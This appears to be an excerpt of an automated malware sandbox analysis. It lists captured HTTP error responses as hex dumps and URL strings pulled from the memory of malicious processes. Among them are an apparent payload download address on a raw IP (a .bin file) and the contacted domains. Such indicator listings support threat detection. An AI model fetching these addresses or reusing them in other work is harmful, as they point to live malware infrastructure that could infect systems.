xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 15:17:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 15:17:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 15:17:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://n-benriya002.com/wp-json/>; rel="https://api.w.org/"Data Raw: 35 66 39 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 6a 61 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 66 6f 6f 74 65 72 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 2d 62 65 6e 72 69 79 61 30 30 32 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6a 73 74 6f 72 6b 2f 6e 2d 66 61 63 74 6f 72 79 2d 63 73 73 2f 70 61 67 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 0a 0a 09 09 3c 21 2d 2d 20 41 6c 6c 20 69 6e 20 4f 6e 65 20 53 45 4f 20 34 2e 35 2e 33 2e 31 20 2d 20 61 69 6f 73 65 6f 2e 63 6f 6d 20 2d 2d 3e 0d 0a 09 09 3c 74 69 74 6c 65 3e 20 20 e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 e7 89 87 e4 bb 98 e3 81 91 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:47 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:50 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:53 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9pdo/ was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:17:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 15:18:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/
Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin
Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin.
Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.bin3c
Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/CkkRLCTUxW193.binO
Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/It3
Source: Untapestried.exe, 00000007.00000002.2158641488.0000000004721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/NTIFIER=Intel64
Source: Untapestried.exe, 00000007.00000002.2158641488.000000000475D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/i
Source: cmd.exe, 0000000C.00000002.2889167441.0000000003E08000.00000004.10000000.00040000.00000000.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2888724701.00000000036B8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://n-benriya002.com/9pdo/?edR0hF=REEnkW6M
Source: 160420241245287.exe, Untapestried.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2057282708.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2056681906.000000000308A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.eternalsunrise.xyz
Source: bvvgQqxLmFZr.exe, 0000000D.00000002.2887373536.000000000115C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.eternalsunrise.xyz/9pdo/
Source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Untapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Untapestried.exe, 00000007.00000001.1996319048.00000000005F2000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.2057282708.0000000005071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBqq
Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2059418152.00000000060DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmd.exe, 0000000C.00000002.2890758236.0000000007C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
